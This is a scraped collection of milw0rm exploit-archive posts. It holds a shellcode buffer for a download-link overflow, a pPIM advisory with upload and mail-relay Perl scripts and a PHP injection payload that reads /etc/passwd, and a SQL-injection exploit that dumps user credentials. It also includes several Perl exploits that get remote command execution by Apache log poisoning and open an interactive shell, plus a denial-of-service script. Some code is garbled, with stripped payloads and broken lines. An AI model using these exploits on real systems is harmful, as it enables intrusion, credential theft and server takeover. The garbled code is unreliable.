tmp += "%eb%59%59%59%59%eb%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%e8%a4%ff%ff%ff%37%49%49%49%49%49%49%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%67%58%50%30%42%31%41%42%6b%42%41%77%32%42%42%32%41%41%30%41%41%58%42%50%38%42%42%75%6d%39%49%6c%4b%58%37%34%43%30%33%30%77%70%6e%6b%73%75%55%6c%6e%6b%61%6c%66%65%50%78%54%41%4a%4f%6c%4b%62%6f%56%78%4c%4b%51%4f%45%70%55%51%7a%4b%31%59%6e%6b%36%54%4c%4b%53%31%6a%4e%45%61%4f%30%5a%39%4c%6c%6e%64%49%50%34%34%55%57%6a%61%4b%7a%66%6d%35%51%6b%72%6a%4b%6c%34%55%6b%41%44%44%64%76%64%73%45%5a%45%4c%4b%73%6f%57%54%47%71%6a%4b%30%66%6c%4b%74%4c%30%4b%6c%4b%53%6f%37%6c%47%71%5a%4b%6e%6b%77%6c%6c%4b%34%41%4a%4b%4b%39%51%4c%44%64%54%44%7a%63%37%41%4f%30%41%74%6c%4b%43%70%76%50%4c%45%4f%30%30%78%66%6c%6c%4b%37%30%64%4c%6c%4b%30%70%65%4c%6c%6d%4c%4b%43%58%36%68%78%6b%75%59%6e%6b%6f%70%4e%50%55%50%55%50%55%50%4e%6b%75%38%55%6c%43%6f%46%51%79%66%63%50%70%56%4c%49%6c%38%6b%33%6f%30%61%6b%32%70%71%78%61%6e%6b%68%7a%42%43%43%71%78%5a%38%6b%4e%6d%5a%76%6e%70%57%69%6f%6d%37%72%43%55%31%30%6c%70%63%76%4e%70%65%72%58%50%65%73%30%67";

// Filename (not important)
tmp += "/a.rar";

// Write link for download for orbit!
document.write ('a href="' + tmp + '">Right click, then choose download with orbit');


script
body
html

# milw0rm

pPIM 1.0 Multiple Remote Vulnerabilities

Version Tested: pPIM 1.0
Vendor notified
Full details can also be found at http://www.lampsecurity.org/node/18
Author: Justin C. Klein Keane

Description

pPIM (http://www.phlatline.org/index.php?page=prod-ppim) is a Personal Information Management application written in PHP that can store contacts (including their photos), events, links, notes, send and check email, and upload files. pPIM came to my attention recently with the publishing on Milw0rm of exploit code designed to facilitate remote command execution (http://www.milw0rm.com/exploits/8093). As there is a milw0rm exploit already posted it is likely malicious users are already exploiting pPIM. I decided to have a closer look at pPIM and, quite frankly, was horrified by what I found. pPIM contains multiple vulnerabilities, from version information leakage, to system credential disclosure, to remote command execution, authentication bypass and cross site scripting vulnerabilities. Possibly the only class of vulnerability pPIM is not exposed to is SQL injection as it doesn't employ any database back end. That said, there seemed to be nothing in the way of security other than an easily bypassable GET variable check in the header, present in pPIM. The following is a brief synopsis of my findings, although I gave up investigation at after discovering so many flaws in the application's architecture with respect to security.

Version Information Leakage:

By calling the URL http://target.tld/ppim/Readme.txt you can view the version information of the installed version of pPIM.

Password Hash Disclosure:

By requesting the URL http://target.tld/ppim/password.dat the password hash is revealed. Depending on the hashing algorithm used by PHP this could be trivially easy to compromise using a password cracking tool like John the Ripper.

Unauthenticated Password Change:

There is no authentication protection on the password changing script, so calling http://target.tld/ppim/changepassword.php will present an attacker with the password change script and allow password reset without confirming the existing password.

Multiple Authentication Problems:

Because the authentication takes place in templates/header.html in an embedded piece of PHP code, depending on server configuration, this code might not be executed. Unless the web server is specifically configured to execute PHP embeded in HTML files server site the PHP code will instead simply be passed back to clients as actual HTML.

Authentication bypass is possible by simply appending the GET variable 'login=1' to the URL. For example, to access the Calendar page, calling the URL 'http://target.tld/ppim/calendar.php' will redirect the unauthenticated user to the login page. However, calling the URL 'http://target.tld/ppim/calendar.php?login=1' will allow unauthenticated access to the Calendar. Any of the pages in pPIM can be accessed this way.

Arbitrary File Upload

pPIM's upload.php script allows attackers to upload arbitrary scripts of any type to the target server. To do this using Perl simply create the file and upload it using Perl:

$ echo "" > phpinfo.php

The execute the following Perl script:

#!/usr/bin/perl
#
# pPIM Uploader by Justin C. Klein Keane
# Used to upload the file phpinfo.php to a target pPIM site
# bypassing authentication.
#
# Feb 24, 2009
#
use LWP::UserAgent;
use HTTP::Request::Common qw(POST);

$ua = LWP::UserAgent->new();
$request = HTTP::Request->new();

$response = $ua->request( POST 'http://target.tld/ppim/upload.php?login=1',
Content_Type => 'form-data',
Content =>
[
'submitupload' => 'submitupload',
'userfile' => ['./info.php']
],
);
die "Error: ", $response->status_line unless $response->is_success;

Unauthorized Email Relay

pPIM's sendmail.php script has absolutely no authentication or validation, allowing anyone with access to the site to relay e-mail. The following Perl script will relay email through the pPIM installation:

#!/usr/bin/perl
#
# pPIM Mailer by Justin C. Klein Keane
# Used to relay mail through any pPIM installation
#
# Feb 24, 2009
#
use LWP::UserAgent;
use HTTP::Request::Common qw(POST);

$ua = LWP::UserAgent->new();
$request = HTTP::Request->new();

$response = $ua->request( POST 'http://target.tld/ppim/sendmail.php',
Content_Type => 'form-data',
Content =>
[
'submitemail' => 'submitemail',
'to' => 'root@localhost',
'from' => 'root@localhost',
'message' => 'You are just asking for spam!'
],
);
die "Error: ", $response->status_line unless $response->is_success;

Posting Unauthenticated Notes

The notes.php script fails to check authentication before inserting new notes. This allows attackers to post notes without even having to bypass authentication. Similarly no authentication is required to delete notes, allowing unauthenticated attackers to clear all stored notes.

XSS Vulnerability

None of the form fields seem to be adequately scrubbed to prevent Cross Site Scripting (XSS). This vulnerability is endemic throughout the application. For instance, creating a note with the title "script alert('foo');/script" causes a JavaScript alert box to pop up the word "foo" whenever the Notes screen is accessed.

System Credential Exposure

Because the Email function stores mailbox information as a flat file it is easy to disclose system account information. For instance, in pPIM, if I were to create a new mailbox for root a file called "root.email" would be created in the email folder. By calling the URL http://target.tld/ppim/email/root.email the following output is exposed
via web browser:



Thus an attacker that can enumerate (or guess) user accounts for mailboxes set up via pPIM can easily disclose server location as well as usernames and passwords. This vulnerability affects all data stored in pPIM - it can be accessed directly via URL call without any form of authentication and will expose any material stored in pPIM to users without authentication.

Arbitrary Command Execution

By creating a specially crafted link an attacker can run arbitrary commands with the privileges of the web server process. By altering the URL field of a link the data files created can be manipulated. Under normal usage a user can create a new link under a group, say the 'test_group' with the name 'testlink', the URL '192.168.0.1' and the description 'test description'. This file is then stored in pPIM's root directory under the links/test_group/ directory as testlink.link. Viewing this file we see:

$ cat testlink.link


This file is included as a PHP include when the note is rendered. Rudimentary JavaScript provides client side validation of input data, but if an attacker arbitrarily submitted a form with the following data:

linkname=evil_link&linkurl=";$url=system('cat
/etc/passwd');$foof="&linkdescription=test2&groupname=test+group&linksubmit=Make+Link

The URL variable is overwritten with injected definition. Looking at the evil_link.link file created on the filesystem we see:

$ cat evil_link.link


Thus we have arbitrarily overwritten the $url variable and assigned it the value that returns from the output of our system call. In fact, now when a user viewed the Links page they could read the /etc/passwd file via a web browser.

Conclusions:

I stopped poking at pPIM after gleaning these details as it became abundantly clear that the application is thoroughly riddled with holes. pPIM fails to enforce any security in it's code, and deploying the application produces a gaping hole in the security of any host.

Recommendations:

Uninstall pPIM immediately!

# milw0rm

MDPro Module My_eGallery (pid) Remote SQL Injection Exploit

#!/usr/bin/perl

read;

MDPro Module My_eGallery Remote SQL Injection Exploit
by s3rg3770 && yeat - staker[at]hotmail[dot]it

dork: inurl:module=My_eGallery pid
note: works regardless of php.ini settings.

read

use IO::Socket;


my ($host,$path,$id) = @ARGV;


if (@ARGV != 3)
{
print "\n+-------------------------------------------------------+\n".
"\r| MDPro Module My_eGallery Remote SQL Injection Exploit |\n".
"\r+-------------------------------------------------------+\n".
"\rby yeat - staker[at]hotmail[dot]it\n".
"\nUsage: perl $0 host /path/ id\n".
"\nhost: localhost\n".
"\rpath: /mdpro/\n".
"\rid: 2\n";
exit;
}
else
{
my ($packet,$inject,$content);

$inject = "index.php?module=My_eGallery&do=showpic&pid=-1".
"/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/0".
",0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat(0x3C7".
"230783E,pn_uname,0x3a,pn_pass,0x3C7230783E),0".
",0,0/**/FROM/**/md_users/**/WHERE/**/pn_uid=$id/*";

$socket = new IO::Socket::INET(
PeerAddr => $host,
PeerPort => 80,
Proto => 'tcp'
) or die $!;


$packet .= "GET /$inject HTTP/1.1\r\n";
$packet .= "Host: $host\r\n";
$packet .= "User-Agent: Lynx (textmode)\r\n";
$packet .= "Connection: close\r\n\r\n";

$socket->send($packet);

while (<$socket>) {
$content .= $_;
}

close($socket);

if ($content =~ /(.+?)/i) {
print "Exploit Successful: $1\n";
}
else {
print "Exploit Failed.\n";
}
}

# milw0rm

pPIM 1.01 (notes.php id) Remote Command Execution Exploit

#!/usr/bin/perl
####################################################################
# pPIM 1.01 (notes.php id) Remote Command Execution Exploit
# url: http://www.phlatline.org/docs/files/ppim.zip
#
# Author: Jose Luis Gongora Fernandez (a.k.a) JosS
# mail: sys-project[at]hotmail[dot]com
# site: http://www.hack0wn.com/
# team: Spanish Hackers Team - [SHT]
#
# thanks for the base code: CWH Underground
# but I changed many things and fix bugs.
#
# Hack0wn Security Project!!
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
#
####################################################################
# OUTPUT: (tested on localhost)
#
# Trying to Inject the Code...
# Successfully injected in ../../../../../../../var/log/apache2/access.log
#
# [shell]:~$ id
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
# [shell]:~$ uname -a
# Linux h4x0rz 2.6.18-6-686 #1 SMP Sat Dec 27 09:31:05 UTC 2008 i686 GNU/Linux
# [shell]:~$ exit
# joss@h4x0rz:~/Desktop$


use LWP::UserAgent;
use IO::Socket;
use LWP::Simple;


@apache=(
"../../../../../../../apache/logs/error.log",
"../../../../../../../apache/logs/access.log",
"../../../../../../../apache/logs/error.log",
"../../../../../../../apache/logs/access.log",
"../../../../../../../apache/logs/error.log",
"../../../../../../../apache/logs/access.log",
"../../../../../../../etc/httpd/logs/acces_log",
"../../../../../../../etc/httpd/logs/acces.log",
"../../../../../../../etc/httpd/logs/error_log",
"../../../../../../../etc/httpd/logs/error.log",
"../../../../../../../var/www/logs/access_log",
"../../../../../../../var/www/logs/access.log",
"../../../../../../../usr/local/apache/logs/access_log",
"../../../../../../../usr/local/apache/logs/access.log",
"../../../../../../../var/log/apache/access_log",
"../../../../../../../var/log/apache2/access_log",
"../../../../../../../var/log/apache/access.log",
"../../../../../../../var/log/apache2/access.log",
"../../../../../../../var/log/access_log",
"../../../../../../../var/log/access.log",
"../../../../../../../var/www/logs/error_log",
"../../../../../../../var/www/logs/error.log",
"../../../../../../../usr/local/apache/logs/error_log",
"../../../../../../../usr/local/apache/logs/error.log",
"../../../../../../../var/log/apache/error_log",
"../../../../../../../var/log/apache2/error_log",
"../../../../../../../var/log/apache/error.log",
"../../../../../../../var/log/apache2/error.log",
"../../../../../../../var/log/error_log",
"../../../../../../../var/log/error.log",
"../../../../../var/log/access_log",
"../../../../../var/log/access_log"
);

system(($^O eq 'MSWin32') ? 'cls' : 'clear');

print "#######################################################################\n";
print "# pPIM 1.01 (notes.php id) Remote Command Execution Exploit | By JosS #\n";
print "#######################################################################\n\n";


if (!$ARGV[0])
{
print "Usage: perl exploit.pl [host]\n";
print " perl exploit.pl localhost\n\n";
exit;}

$host=$ARGV[0];
$path="/notes.php?mode=edit&id="; # change if it is necesary

# if ( $host =~ /^http:/ ) {$host =~ s/http:\/\///g;}

print "\nTrying to Inject the Code...\n";
$CODE="";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Could not connect to host.\n\n";
print $socket "GET /images/"."\#\#%\$\$%\#\#".$CODE."\#\#%\$\$%\#\#" . "HTTP/1.1";
print $socket "Host: ".$host."\r\n";
print $socket "Connection: close\r\n\r\n";
close($socket);

if ( $host !~ /^http:/ ) {$host = "http://" . $host;}

foreach $getlog(@apache)
{
chomp($getlog);
$find= $host.$path.$getlog; # $find= $host.$path.$getlog."";
$xpl = LWP::UserAgent->new() or die "Could not initialize browser\n";
$req = HTTP::Request->new(GET => $find);
$res = $xpl->request($req);
$info = $res->content;
if($info =~ /\#\#\%\$\$\%\#\#/) # change if it is necesary
{print "Successfully injected in $getlog \n\n";$log=$getlog; last;}
}

print "[shell]:~\$ ";
chomp( $cmd = );

while($cmd !~ "exit") {
$shell= $host.$path.$log."&cmd=$cmd"; # $shell= $host.$path.$log."&cmd=$cmd";
$xpl = LWP::UserAgent->new() or die "Could not initialize browser\n";
$req = HTTP::Request->new(GET => $shell);
$res = $xpl->request($req);
$info = $res->content;
if ($info =~ /\#\#%\$\$%\#\#(.*?)\#\#%\$\$%\#\#/sg)
{print $1;}
print "[shell]:~\$ ";
chomp( $cmd = );
}


# __h0__

# milw0rm

Free Arcade Script 1.0 LFI Command Execution Exploit

#!/usr/bin/perl

# |----------------------------------------------------------------------------------------------------------------------------------|
# | INFORMATIONS |
# |----------------------------------------------------------------------------------------------------------------------------------|
# |Web Application : Free Arcade Script 1.0 |
# |Download : http://freearcadescript.net/download.php?type=zip&name=freearcadescript&size=null&file=freearcadescriptv1.0.zip |
# |----------------------------------------------------------------------------------------------------------------------------------|
# |Remote Command Execution Exploit via Apache Log Injection |
# |by Osirys |
# |osirys[at]autistici[dot]org |
# |osirys.org |
# |Thx&Greets to: evilsocket, Fireshot, Todd, str0ke |
# |----------------------------------------------------------------------------------------------------------------------------------|
# |/[path]/pages/play.php is affected to Local File Inclusion vulnerability:
# |[code]
# |No game selected.';
# | include ('templates/'.$template.'/footer.php');
# | exit;
# |}
# |[/code]
# |$template is not declared. So, in case of php.ini configuration :
# |register_globals = On
# |we can set $template value from GET :
# |p0c : /[path]/pages/play.php?template=[lfi]

# ------------------------------------------------------------------
# Exploit in action [>!]
# ------------------------------------------------------------------
# osirys[~]>$ perl lfi.txt http://localhost/freearcadescriptv1.0/
#
# ---------------------------------
# Free Arcade Script RCE Sploit
# (Log Inj)
# by Osirys
# ---------------------------------
#
# [*] Injecting evil php code ..
# [*] Cheeking for Apache Logs ..
# [*] Apache Log Injection completed
# [*] Path: /var/log/httpd/access_log
# [!] Hi my master, do your job now [x]
#
# shell[localhost]$> id
# uid=80(apache) gid=80(apache) groups=80(apache)
# shell[localhost]$> pws
# bash: pws: command not found
# shell[localhost]$> pwd
# /home/osirys/web/freearcadescriptv1.0/pages
# shell[localhost]$> exit
# [-] Quitting ..
#
# osirys[~]>$
# ------------------------------------------------------------------


use IO::Socket::INET;
use LWP::UserAgent;

my $host = $ARGV[0];
my $lfi_path = "/pages/play.php?template=";
my $null_byte = "";
my $rand_a = int(rand 150);
my $rand1 = "1337".$rand_a."1337";
my $rand_b = int(rand 150);
my $rand2 = "1337".$rand_b."1337";
my $gotcha = 0;
my $dir_trasv = "../../../../../../../../../..";
my @logs_dirs = qw(
/var/log/httpd/access_log
/var/log/httpd/access.log
/var/log/httpd/error.log
/var/log/httpd/error_log
/var/log/access_log
/logs/error.log
/logs/access.log
/var/log/apache/error_log
/var/log/apache/error.log
/etc/httpd/logs/access_log
/usr/local/apache/logs/error_log
/etc/httpd/logs/access.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/www/logs/access_log
/var/www/logs/access.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/access_log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error.log
/var/log/error_log
/apache/logs/error.log
/apache/logs/access.log
);

my $php_code = "";

($host) || help("-1");
cheek($host) == 1 || help("-2");
&banner;

$datas = get_input($host);
$datas =~ /(.*) (.*)/;
($h0st,$path) = ($1,$2);


$sock = IO::Socket::INET->new(
PeerAddr => $h0st,
PeerPort => 80,
Proto => "tcp"
) || die "Can't connect to $host:80!\n";

print "[*] Injecting evil php code ..\n";


print $sock "GET /Osirys_log_inj start0".$rand1.$php_code."0end".$rand2." HTTP/1.1\r\n";
print $sock "Host: ".$host."\r\n";
print $sock "Connection: close\r\n\r\n";
close($sock);

print "[*] Cheeking for Apache Logs ..\n";

while (($log = <@logs_dirs>)&&($gotcha != 1)) {
$tmp_path = $host.$lfi_path.$dir_trasv.$log.$null_byte;
$re = get_req($tmp_path);
if ($re =~ /Osirys_log_inj/) {
$gotcha = 1;
$log_path = $tmp_path;
print "[*] Apache Log Injection completed\n";
print "[*] Path: $log\n";
print "[!] Hi my master, do your job now [x]\n\n";
&exec_cmd;
}
}

$gotcha == 1 || die "[-] Couldn't find Apache Logs\n";

sub exec_cmd {
$h0st !~ /www\./ || $h0st =~ s/www\.//;
print "shell[$h0st]\$> ";
$cmd = ;
$cmd !~ /exit/ || die "[-] Quitting ..\n\n";
$exec_url = $log_path."&cmd=".$cmd;
my $re = get_req($exec_url);
my $content = tag($re);
if ($content =~ m/start0$rand1(.+)\*0end$rand2/g) {
my $out = $1;
$out =~ s/\$/ /g;
$out =~ s/\*/\n/g;
chomp($out);
print "$out\n";
&exec_cmd;
}
else {
$c++;
$cmd =~ s/\n//;
print "bash: ".$cmd.": command not found\n";
$c < link =" $_[0];" req =" HTTP::Request-">new(GET => $link);
my $ua = LWP::UserAgent->new();
$ua->timeout(4);
my $response = $ua->request($req);
return $response->content;
}

sub cheek() {
my $host = $_[0];
if ($host =~ /http:\/\/(.*)/) {
return 1;
}
else {
return 0;
}
}

sub get_input() {
my $host = $_[0];
$host =~ /http:\/\/(.*)/;
$s_host = $1;
$s_host =~ /([a-z.-]{1,30})\/(.*)/;
($h0st,$path) = ($1,$2);
$path =~ s/(.*)/\/$1/;
$full_det = $h0st." ".$path;
return $full_det;
}

sub tag() {
my $string = $_[0];
$string =~ s/ /\$/g;
$string =~ s/\s/\*/g;
return($string);
}

sub banner {
print "\n".
" --------------------------------- \n".
" Free Arcade Script RCE Sploit \n".
" (Log Inj) \n".
" by Osirys \n".
" --------------------------------- \n\n";
}

sub help() {
my $error = $_[0];
if ($error == -1) {
&banner;
print "\n[-] Input data failed ! \n";
}
elsif ($error == -2) {
&banner;
print "\n[-] Bad hostname address !\n";
}
print "[*] Usage : perl $0 http://hostname/cms_path\n\n";
exit(0);
}

# milw0rm

Pyrophobia 2.1.3.1 LFI Command Execution Exploit

#!/usr/bin/perl

# |----------------------------------------------------------------------------------------------------------------------------------|
# | INFORMATIONS |
# |----------------------------------------------------------------------------------------------------------------------------------|
# |Web Application : Pyrophobia 2.1.3.1 |
# |Download : http://surfnet.dl.sourceforge.net/sourceforge/pyrophobia/pyro2_1_3_1.tar.gz |
# |----------------------------------------------------------------------------------------------------------------------------------|
# |Remote Command Execution Exploit via Apache Log Injection |
# |by Osirys |
# |osirys[at]autistici[dot]org |
# |osirys.org |
# |Thx&Greets to: evilsocket, Fireshot, Todd, str0ke |
# |----------------------------------------------------------------------------------------------------------------------------------|
# |/[path]/index.php is affected to Local File Inclusion vulnerability:
# |[code]
# |
# | if($_GET['pid']){ //if page id is set do custom content functions
# | $pid=stripslashes($_GET['pid']);
# | $pid=htmlspecialchars($pid);
# | if ($pid=='') {
# | include('modules/index.php');
# | } elseif (!file_exists('content/'.$pid.'.php')) {
# | include('modules/index.php');
# | } else {
# | include('content/'.$pid.'.php');
# | }
# | }
# |<.... code ....>
# |[/code]
# |$pid comes from GET directly.
# |Works regardless of php.ini settings !
# |p0c : /[path]/index.php?pid=[lfi]

# ------------------------------------------------------------------
# Exploit in action [>!]
# ------------------------------------------------------------------
# osirys[~]>$ perl lfi.txt http://localhost/pyro2_1_3_1/
#
# ---------------------------------
# Pyrophobia Forum RCE Sploit
# (Log Inj)
# by Osirys
# ---------------------------------
#
# [*] Injecting evil php code ..
# [*] Cheeking for Apache Logs ..
# [*] Apache Log Injection completed
# [*] Path: /var/log/httpd/access_log
# [!] Hi my master, do your job now [x]
#
# shell[localhost]$> id
# uid=80(apache) gid=80(apache) groups=80(apache)
# shell[localhost]# shell[localhost]$> pws
gt; pws
# bash: pws: command not found
# shell[localhost]$> pwd
# /home/osirys/web/pyro2_1_3_1
# shell[localhost]$> exit
# [-] Quitting ..
#
# osirys[~]>$
# ------------------------------------------------------------------


use IO::Socket::INET;
use LWP::UserAgent;

my $host = $ARGV[0];
my $lfi_path = "/index.php?pid=";
my $null_byte = "";
my $rand_a = int(rand 150);
my $rand1 = "1337".$rand_a."1337";
my $rand_b = int(rand 150);
my $rand2 = "1337".$rand_b."1337";
my $gotcha = 0;
my $dir_trasv = "../../../../../../../../../..";
my @logs_dirs = qw(
/var/log/httpd/access_log
/var/log/httpd/access.log
/var/log/httpd/error.log
/var/log/httpd/error_log
/var/log/access_log
/logs/error.log
/logs/access.log
/var/log/apache/error_log
/var/log/apache/error.log
/etc/httpd/logs/access_log
/usr/local/apache/logs/error_log
/etc/httpd/logs/access.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/www/logs/access_log
/var/www/logs/access.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/access_log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error.log
/var/log/error_log
/apache/logs/error.log
/apache/logs/access.log
);

my $php_code = "";

($host) || help("-1");
cheek($host) == 1 || help("-2");
&banner;

$datas = get_input($host);
$datas =~ /(.*) (.*)/;
($h0st,$path) = ($1,$2);


$sock = IO::Socket::INET->new(
PeerAddr => $h0st,
PeerPort => 80,
Proto => "tcp"
) || die "Can't connect to $host:80!\n";

print "[*] Injecting evil php code ..\n";


print $sock "GET /Osirys_log_inj start0".$rand1.$php_code."0end".$rand2." HTTP/1.1\r\n";
print $sock "Host: ".$host."\r\n";
print $sock "Connection: close\r\n\r\n";
close($sock);

print "[*] Cheeking for Apache Logs ..\n";

while (($log = <@logs_dirs>)&&($gotcha != 1)) {
$tmp_path = $host.$lfi_path.$dir_trasv.$log.$null_byte;
$re = get_req($tmp_path);
if ($re =~ /Osirys_log_inj/) {
$gotcha = 1;
$log_path = $tmp_path;
print "[*] Apache Log Injection completed\n";
print "[*] Path: $log\n";
print "[!] Hi my master, do your job now [x]\n\n";
&exec_cmd;
}
}

$gotcha == 1 || die "[-] Couldn't find Apache Logs\n";

sub exec_cmd {
$h0st !~ /www\./ || $h0st =~ s/www\.//;
print "shell[$h0st]\$> ";
$cmd = ;
$cmd !~ /exit/ || die "[-] Quitting ..\n\n";
$exec_url = $log_path."&cmd=".$cmd;
my $re = get_req($exec_url);
my $content = tag($re);
if ($content =~ m/start0$rand1(.+)\*0end$rand2/g) {
my $out = $1;
$out =~ s/\$/ /g;
$out =~ s/\*/\n/g;
chomp($out);
print "$out\n";
&exec_cmd;
}
else {
$c++;
$cmd =~ s/\n//;
print "bash: ".$cmd.": command not found\n";
$c < link =" $_[0];" req =" HTTP::Request-">new(GET => $link);
my $ua = LWP::UserAgent->new();
$ua->timeout(4);
my $response = $ua->request($req);
return $response->content;
}

sub cheek() {
my $host = $_[0];
if ($host =~ /http:\/\/(.*)/) {
return 1;
}
else {
return 0;
}
}

sub get_input() {
my $host = $_[0];
$host =~ /http:\/\/(.*)/;
$s_host = $1;
$s_host =~ /([a-z.-]{1,30})\/(.*)/;
($h0st,$path) = ($1,$2);
$path =~ s/(.*)/\/$1/;
$full_det = $h0st." ".$path;
return $full_det;
}

sub tag() {
my $string = $_[0];
$string =~ s/ /\$/g;
$string =~ s/\s/\*/g;
return($string);
}

sub banner {
print "\n".
" --------------------------------- \n".
" Pyrophobia Forum RCE Sploit \n".
" (Log Inj) \n".
" by Osirys \n".
" --------------------------------- \n\n";
}

sub help() {
my $error = $_[0];
if ($error == -1) {
&banner;
print "\n[-] Input data failed ! \n";
}
elsif ($error == -2) {
&banner;
print "\n[-] Bad hostname address !\n";
}
print "[*] Usage : perl $0 http://hostname/cms_path\n\n";
exit(0);
}

# milw0rm

ot All Media 7.0.0.3 (t00t) Remote Denial of Service Exploit

#!/usr/local/bin/perl
#
# Title: Got All Media 7.0.0.3 Remote Denial Of Service Exploit
# Product web page: http://www.gallm.com/default.aspx
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# liquidworm [t00t] gmail [w00t] com
# http://www.zeroscience.org
# 19.02.2009
#

print "\n[*] t00ting...\n";

use LWP::Simple;

my $url = 'http://127.0.0.1:5550/t00t';
my $freeze = get $url;
die "Couldn't get $url" unless defined $freeze;

# milw0rm